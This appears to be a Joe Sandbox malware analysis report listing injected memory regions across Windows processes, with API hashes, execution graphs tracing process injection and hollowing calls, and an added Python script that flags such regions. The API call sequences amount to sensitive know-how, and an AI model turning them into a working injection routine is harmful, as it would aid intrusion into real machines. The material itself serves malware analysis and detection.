• VirtualAllocEx.KERNELBASE ref: 013A1FDE
• WriteProcessMemory.KERNEL32 ref: 013A2000
• CreateRemoteThread.KERNEL32 ref: 013A2028
Strings
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
• String ID: @
• API String ID: 1718980022-2766056989
• Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
• Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
• Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
• Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
• NtQueryDirectoryFile.NTDLL ref: 013A22E1
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: DirectoryFileQuery
• String ID:
• API String ID: 3295332484-0
• Opcode ID: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
• Instruction ID: e0790b7cde930f9071a54467fb040e6366f2397dce5016f84bcb1becc2eb7ebb
• Opcode Fuzzy Hash: 60616ae1fcc6cbf86718ecfd86d321865c6476175aa306813cb9b129d8017b94
• Instruction Fuzzy Hash: 6A412E70518A4E8FDF95EF5CC894B6A7BE4FB6E359F80016AE909C7290D734D484CB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 118 13a1ee1-13a1f5d NtCreateUserProcess
APIs
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
• Instruction ID: 32af6664475258df2025926b18748e272a5399bca74b2e2a3e5bffc18d134367
• Opcode Fuzzy Hash: 94379df3e286b699d65894a0865ea8b3d4463f1672bff53da76e62b6f5315873
• Instruction Fuzzy Hash: 30114C74908A8C8FDFC4EF6CC488A697BE0FB68355F54062AB859C32A0D775D8948B41
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: de05bf30cab85946a627ca7ca8936c8e7440409c663a25d904fe20d67b3adcc0
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: D721F730B34C1E0BFB68A27C9859764F6D2E79C320F980295EA1DD36E4ED58CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2907441227.0000000001380000.00000040.00000400.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1380000_explorer.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: b142c140a4449e8d03ebce8a136155a13ceda980854198c96ff8cdc129ca3d2e
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: EB3106720203056FEF057F749D46ABA3FACEF11318F040165BD85DA0A5EA3049A9CAB6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: ExitThreadUser
• String ID:
• API String ID: 3424019298-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: c25900c69d3d233e20b6c0933702651d16b823d01824eaf3648888e0633aa3cb
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: C03127720102057FEB057F749D4AABA3FACEF11318F840165BD95DA0A5EA344964CBBA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000003.00000002.2908667717.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_13a0000_explorer.jbxd
Similarity
• API ID: ExitThreadUser
• String ID:
• API String ID: 3424019298-0
• Opcode ID: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
• Instruction ID: d157ced967fd7b67688515da118957b9b7ecc78bb560cdc002d4436a04f96d17
• Opcode Fuzzy Hash: e4423c0a58cdb4c7a61b8c611d717cf6067e42c28c7b42a6ea57d7b01533138c
• Instruction Fuzzy Hash: BEC04C2757090607CE18777C6C59458795CE92113EBC06735A567D4095E829451642AA
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 105
Total number of Limit Nodes: 6

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: EnumerateValue
• String ID:
• API String ID: 1749906896-0
• Opcode ID: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
• Instruction ID: cdfd058294846393527a23a69d82aed125c299c38b3c44931be5a47ac5480816
• Opcode Fuzzy Hash: 45d53095cbbf9c766309197109e34ac0c8c251fd450118505d4c08bfa770ae20
• Instruction Fuzzy Hash: F3213D31518E5D8F8F55EF1C8809FEA37E1FB68755B42032AAC19E3200D730D98087C1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: dd34eb1389eaef043c92a696ed53661b54a7e883a9eaaee22049f10a42ac24d8
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: E221F730B34C1D0BEB58A77C9859764F6D2E79C320F990299E91ED36E5ED58CC8183C6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
Memory Dump Source
• Source File: 00000004.00000002.2888928023.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_sihost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 23dfea852a366a571cc3348c698cc6744426d11f639f151413aad9b7f5eb2e10
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 9231E472000204AFEF017F709E86FBA3BACEF11300F424169BD85DA0A2EA7449658BB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 69
Total number of Limit Nodes: 4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2886729770.0000000000910000.00000040.00000001.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_910000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 0bb578ed6cec17c8f136f477abcb2608ff25218c2125ec3b643453ee16afebde
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DE31D67220420C7FEB017B709D46BFA3B6CEF91300F4001A5BD85DA0A2DAB649D5CBB5
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 69
Total number of Limit Nodes: 4

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000006.00000002.2887243645.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_9a0000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 87a61ee7780fe3dd6be775b2a921c89204c80ea1769b2b74f3f30dd65b7be30b
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: DB31E6724102046FEB017B749D4ABBA7BACEF92310F000165BD85DA0A6EA7549648AFA
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 8.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 101
Total number of Limit Nodes: 4

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction ID: e5dc80538da9fb4d46b28acacc3c2bb4e555f0cc24faa64339f8904ee302d7fe
• Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
• Instruction Fuzzy Hash: 9621D631A34C1D0BEB58A27C9859774F6E2F79C321F940295ED19D36D4ED68CC8183C6
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
Legend: Executed / Not Executed (the block colouring of the rendered graph is not preserved in text)
control_flow_graph of a50811 (source of the graph image). Basic blocks with calls: a50811-a50846 call a5086e; a508b9-a508cc call a51756, call a51e62; a508d4 call a508d9; a508d9-a50906 call a50cc4, call a514bc, call a50643, call a50ce8; a50939 call a5093e.
APIs
Memory Dump Source
• Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d9c953606555283b5bd9303adf5bc3df3a133a87740289e9a75d62b9567f8b42
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: D831C672410204AFEF017F709E87EBA3BACFF11312F440165FD95DA0A6EA744969CAB5
Uniqueness
Uniqueness Score: -1.00%

Execution Graph
Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 67
Total number of Limit Nodes: 5
execution_graph (source of the graph image; first node d408d9). Nodes with resolved labels, by address: d40643, d406c2, d40811, d408b3, d408d9, d4093e, d40af3, d40b65, d40c3f, d40cc4, each labelled GetPEB; no other API name is resolved in this snapshot.
Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000008.00000002.2888693305.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 08b2109dcbf42d691bd0579a811ffb356924513e44b27f1ccfa88f3ac837c6f5
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: A631C672410244AFEB017B709D86ABA3FACEF11310F440165BE85DA0A6EA7449A5CAF5
Uniqueness
Uniqueness Score: -1.00%

Execution Graph
Execution Coverage: 5.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 70
Total number of Limit Nodes: 4
execution_graph (source of the graph image; first node b508d9). Nodes with resolved labels, by address: b50643, b506c2, b50811, b508b3, b508d9, b5093e, b50af3, b50b65, b50c3f, b50cc4, each labelled GetPEB; no other API name is resolved in this snapshot.
Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000009.00000002.2888642573.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: d0a9b7ccad2424afbd224703fef996352ea6b7a6d1d9ad784538435e3ee26c62
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 5E31D4720202046FEB017F709D86FBA3BECEF11312F0005E5BD95DA0A6EA744D69CAB5
Uniqueness
Uniqueness Score: -1.00%

Execution Graph
Execution Coverage: 7.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 80
Total number of Limit Nodes: 8
execution_graph (source of the graph image; first node 1108d9). Nodes with resolved labels, by address: 110643 (5 API calls); 1106c2 (7 API calls); 110811 (7 API calls); 1108b3 (7 API calls); 1108d9 (5 API calls); 11091f SleepEx RtlExitUserThread; 11093e (5 API calls); 110af3 (7 API calls); 110b65 (7 API calls); 110c3f GetPEB; 110cc4 GetPEB.
Control-flow Graph
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2886556042.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
Similarity
• API ID: ExitSleepThreadUser
• String ID:
• API String ID: 3375650085-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: e0c6e7e9a2d7599d1d0e12609d6689695a60be68487ad526544be4dcdcbfa815
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 4B31D6728042047FEB0A7B709D46AFA7B6CEF15300F000175BD85DA0A2EBB449D5CBB5
Uniqueness
Uniqueness Score: -1.00%
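The four Memory Dump Source blocks above describe the same code in four different processes: ctfmon (PID 7), svchost (8), StartMenuExperienceHost (9) and RuntimeBroker (10) each carry a region with protection 00000040 (PAGE_EXECUTE_READWRITE), type 00020000 (MEM_PRIVATE), "based on PE: false", and the identical Opcode ID 992149f3..., while the ctfmon region also contains a second function with Opcode ID d4c8ab3f.... The script below is an added example, not code from Joe Sandbox or from this report: it parses those lines in the form they appear here, decodes the Win32 protection and type fields from the .sdmp name, flags regions that look like injected code, and groups regions by Opcode ID to show which processes share it. The field layout of the .sdmp name (pid.run.dump.base.protect.flag.type.reserved, all hexadecimal) is an assumption about Joe Sandbox's naming; the sample report text is constructed from the values on this page.

```python
"""Correlate injected-region metadata across processes in a Joe Sandbox report.

Added example; not code from Joe Sandbox or from the report. Parses the
"Source File", "Snapshot File" and "Opcode ID" lines as they appear on the
page and flags regions that look like injected code: executable and
writable, MEM_PRIVATE (not image-backed) and "based on PE: false".

Assumption (layout of the .sdmp name, every field hexadecimal):
  <pid>.<run>.<dump id>.<base>.<protect>.<flag>.<type>.<reserved>.sdmp
where <protect> and <type> are the PAGE_* / MEM_* values VirtualQuery reports.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# winnt.h constants
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80   # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80     # PAGE_READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})"
    r"\.(?P<type>[0-9A-Fa-f]{8})\.(?P<rsv>[0-9A-Fa-f]{8})\.sdmp"
)
SRC_LINE = re.compile(r"Source File:\s*(\S+\.sdmp),.*?based on PE:\s*(true|false)", re.I)
SNAP_LINE = re.compile(r"Snapshot File:\s*hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_(.+?)\.jbxd")
OPCODE_LINE = re.compile(r"Opcode ID:\s*([0-9A-Fa-f]{64})")


@dataclass
class Region:
    pid: int
    process: str
    base: int
    protect: int
    mem_type: int
    pe_backed: bool
    opcode_id: str


def parse_sdmp_name(name: str) -> Dict[str, int]:
    m = SDMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"unexpected dump name: {name}")
    return {k: int(v, 16) for k, v in m.groupdict().items()}


def is_rwx(protect: int) -> bool:
    return bool(protect & PAGE_EXECUTE_MASK) and bool(protect & PAGE_WRITE_MASK)


def parse_report(text: str) -> List[Region]:
    """One Region per 'Source File' line; following Snapshot/Opcode lines fill it in."""
    regions: List[Region] = []
    cur = None
    for line in text.splitlines():
        m = SRC_LINE.search(line)
        if m:
            f = parse_sdmp_name(m.group(1))
            cur = Region(f["pid"], "", f["base"], f["protect"], f["type"],
                         m.group(2).lower() == "true", "")
            regions.append(cur)
            continue
        m = SNAP_LINE.search(line)
        if m and cur is not None:
            cur.process = m.group(4)
            continue
        m = OPCODE_LINE.search(line)
        if m and cur is not None:
            cur.opcode_id = m.group(1).lower()
    return regions


def find_injected(regions: List[Region]) -> List[Region]:
    """Private RWX memory that is not a mapped PE is the classic injected-code shape."""
    return [r for r in regions
            if is_rwx(r.protect) and r.mem_type == MEM_PRIVATE and not r.pe_backed]


def group_by_opcode(regions: List[Region]) -> Dict[str, List[str]]:
    groups = defaultdict(set)
    for r in regions:
        if r.opcode_id:
            groups[r.opcode_id].add(r.process)
    return {k: sorted(v) for k, v in groups.items()}


# Constructed sample: the metadata lines from the report blocks above.
REPORT = """\
Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
Source File: 00000007.00000002.2888442084.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
Snapshot File: hcaresult_7_2_a50000_ctfmon.jbxd
Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
Source File: 00000008.00000002.2888693305.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
Snapshot File: hcaresult_8_2_d40000_svchost.jbxd
Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
Source File: 00000009.00000002.2888642573.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
Snapshot File: hcaresult_9_2_b50000_StartMenuExperienceHost.jbxd
Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
Source File: 0000000A.00000002.2886556042.0000000000110000.00000040.00000001.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
Snapshot File: hcaresult_10_2_110000_RuntimeBroker.jbxd
Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
"""

if __name__ == "__main__":
    regs = parse_report(REPORT)
    for r in find_injected(regs):
        print(f"pid {r.pid:>2} {r.process:<24} base 0x{r.base:08x} "
              f"protect 0x{r.protect:02x} type 0x{r.mem_type:x} pe={r.pe_backed}")
    for opcode, procs in group_by_opcode(regs).items():
        print(f"{opcode[:16]}... in {len(procs)} process(es): {', '.join(procs)}")
```

The grouping is the useful part for triage: an Opcode ID that recurs across unrelated host processes at different base addresses is the same injected payload, while the second ID seen only in ctfmon is a different function inside the same region, so it should not be read as a second injection.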

Execution Graph
Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 31.4%
Signature Coverage: 0%
Total number of Nodes: 462
Total number of Limit Nodes: 5
execution_graph (source of the graph image; the listing on this page breaks off after node 5409 1c0ba4). Nodes with resolved API labels, by address:
• 1c0954 Sleep RtlExitUserThread OpenMutexA; 1c098f GetStartupInfoA; 1c09de CreateProcessA; 1c09ee GetThreadContext; 1c0a16 VirtualProtectEx; 1c0a3c/1c0a3d DuplicateHandle; 1c0a82 WriteProcessMemory; 1c0ab0 ResumeThread; 1c0ac1 Sleep OpenMutexA; 1c0af3 (21 API calls)
• 1c0b2c LoadLibraryA; 1c0b65 (28 API calls); 1c0b6a FindWindowA; 1c0b74 GetWindowThreadProcessId OpenProcess; 1c0c3f GetPEB; 1c0cc4 GetPEB
• 1c1345 (3 API calls); 1c1364 VirtualProtect; 1c137c VirtualAlloc; 1c13ad VirtualProtect
• 1c31e9 lstrcat; 1c321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle; 1c34c6 lstrlen; 1c34df VirtualFree CloseHandle; 1c38e8 lstrcat
• 1c3d4b LoadLibraryA; 1c3d7e LoadLibraryA; 1c3d8b LoadLibraryA; 1c3e9f GetProcAddress; 1c3ec3 (12 API calls); 1c3ec8 LoadLibraryA; 1c3f0d (7 API calls); 1c3f2b GetModuleHandleA; 1c3f46 Sleep; 1c3f56 Sleep; 1c3f66 Sleep; 1c401b (3 API calls); 1c409a (3 API calls)
• 1c49ae CreateEventA; 1c4d53 WaitForSingleObject
• 850000 VirtualProtect; 850528 VirtualProtect; 8506d0 VirtualProtect
• 238382b VirtualAlloc (2 API calls); 2383843 CreateThread; 23839d7 RtlInitializeCriticalSection (2 API calls); 23839e7 VirtualAlloc; 2383f4f GetModuleHandleA; 2383f6a Sleep; 2383f7a Sleep; 2383f8a Sleep; 238403f (4 API calls)
ExitProcess 5408->5409 5414 1c08b9 5411->5414 5422 1c08d9 5414->5422 5423 1c0cc4 GetPEB 5422->5423 5424 1c08e5 5423->5424 5425 1c14bc 3 API calls 5424->5425 5426 1c08ea 5425->5426 5430 1c0643 5426->5430 5429 1c08ef 5438 1c093e 5429->5438 5431 1c0660 5430->5431 5459 1c067c 5431->5459 5433 1c0673 5465 1c06c2 5433->5465 5435 1c080f 5435->5429 5436 1c06b9 5436->5435 5469 1c0811 5436->5469 5439 1c0cc4 GetPEB 5438->5439 5440 1c094a 5439->5440 5441 1c14bc 3 API calls 5440->5441 5442 1c094f 5441->5442 5443 1c0954 Sleep RtlExitUserThread OpenMutexA 5442->5443 5444 1c098f GetStartupInfoA 5443->5444 5445 1c0af1 5443->5445 5446 1c09d9 17 API calls 5444->5446 5445->5429 5454 1c09d2 5446->5454 5447 1c0a3d DuplicateHandle 5448 1c0aec 5447->5448 5449 1c0a82 WriteProcessMemory 5447->5449 5452 1c0af3 17 API calls 5448->5452 5449->5448 5451 1c0ab0 ResumeThread 5449->5451 5450 1c0a3c 5450->5447 5453 1c0ac1 Sleep OpenMutexA 5451->5453 5452->5445 5453->5445 5456 1c0ae7 5453->5456 5454->5447 5454->5450 5455 1c09de CreateProcessA 5454->5455 5455->5448 5457 1c09ee GetThreadContext 5455->5457 5456->5448 5456->5453 5457->5448 5458 1c0a16 VirtualProtectEx 5457->5458 5458->5448 5458->5450 5460 1c0681 5459->5460 5461 1c06c2 29 API calls 5460->5461 5463 1c06b9 5461->5463 5462 1c080f 5462->5433 5463->5462 5464 1c0811 29 API calls 5463->5464 5464->5462 5467 1c06c7 5465->5467 5466 1c080f 5466->5436 5467->5466 5468 1c0811 29 API calls 5467->5468 5468->5466 5470 1c0840 5469->5470 5471 1c0863 5470->5471 5472 1c08d9 29 API calls 5470->5472 5473 1c0866 5470->5473 5471->5473 5474 1c0cc4 GetPEB 5471->5474 5472->5471 5473->5435 5475 1c08e5 5474->5475 5476 1c14bc 3 API calls 5475->5476 5477 1c08ea 5476->5477 5478 1c0643 29 API calls 5477->5478 5480 1c08ef 5478->5480 5479 1c093e 29 API calls 5479->5480 5480->5479 5680 1c2f3f 5681 1c2f44 5680->5681 5682 1c2f4a lstrlen 5681->5682 5683 1c2f61 5682->5683 5684 1c292d 5685 1c3653 5684->5685 5686 1c2932 LoadLibraryA 5685->5686 5687 1c2948 5686->5687 5688 1c2961 
VirtualAlloc 5687->5688 5688->5688 5689 1c2979 5688->5689 5707 1c29a6 5689->5707 5708 1c3653 5707->5708 5709 1c29ab lstrcat 5708->5709 5710 1c29c1 5709->5710 5724 1c29dd 5710->5724 5725 1c3653 5724->5725 5726 1c29e2 lstrcat 5725->5726 5727 1c29f8 5726->5727 5737 1c2a14 5727->5737 5738 1c3653 5737->5738 5739 1c2a19 lstrcat 5738->5739 5744 1c2a20 5739->5744 5741 1c2a8a DeleteFileA 5741->5744 5742 1c2ace DeleteFileA 5742->5744 5743 1c2b34 Sleep 5743->5744 5744->5741 5744->5742 5744->5743 5745 1c2b1e DeleteFileA 5744->5745 5746 1c2b4d 5744->5746 5745->5743 5747 1c2b5e 5746->5747 5748 1c2c41 Sleep 5747->5748 5750 1c2cf7 5747->5750 5751 1c2c99 5747->5751 5748->5747 5748->5748 5750->5744 5754 1c2b5e 5751->5754 5752 1c2cf7 5752->5747 5753 1c2c41 Sleep 5753->5753 5753->5754 5754->5751 5754->5752 5754->5753 5889 1c0b6b GetWindowThreadProcessId OpenProcess 5890 1c0bac 5889->5890 5893 1c0b8e 5889->5893 5891 1c08b3 29 API calls 5890->5891 5892 1c0bb1 5891->5892 5894 1c0c3f GetPEB 5892->5894 5893->5890 5895 1c0ba4 ExitProcess 5893->5895 5896 1c0bb6 5894->5896 5948 2380b8f 5949 2380ba1 OpenProcess 5948->5949 5950 2380bd0 5949->5950 5953 2380bb2 5949->5953 5951 23808d7 3 API calls 5950->5951 5952 2380bd5 5951->5952 5954 2380c63 GetPEB 5952->5954 5953->5950 5955 2380bc8 ExitProcess 5953->5955 5956 2380bda 5954->5956 5485 2380000 5487 2380005 5485->5487 5502 2380ce8 5487->5502 5489 2380011 5505 23833ca 5489->5505 5491 2380016 5509 238098b OpenMutexA 5491->5509 5494 238038f 5495 2380697 5531 23806e6 5495->5531 5496 238002e 5496->5494 5496->5495 5525 23806a0 5496->5525 5499 2380833 5500 23806dd 5500->5499 5535 2380835 5500->5535 5543 2380c63 GetPEB 5502->5543 5504 2380ced 5504->5489 5506 23833ea 5505->5506 5545 2383409 GetVolumeInformationA 5506->5545 5508 2383405 5508->5491 5510 23809b3 GetStartupInfoA 5509->5510 5511 238001b ExitProcess 5509->5511 5547 23809fd 5510->5547 5511->5496 5513 2380a60 5513->5511 5514 23809f6 5514->5513 5515 2380a02 CreateProcessA 5514->5515 5516 2380b10 
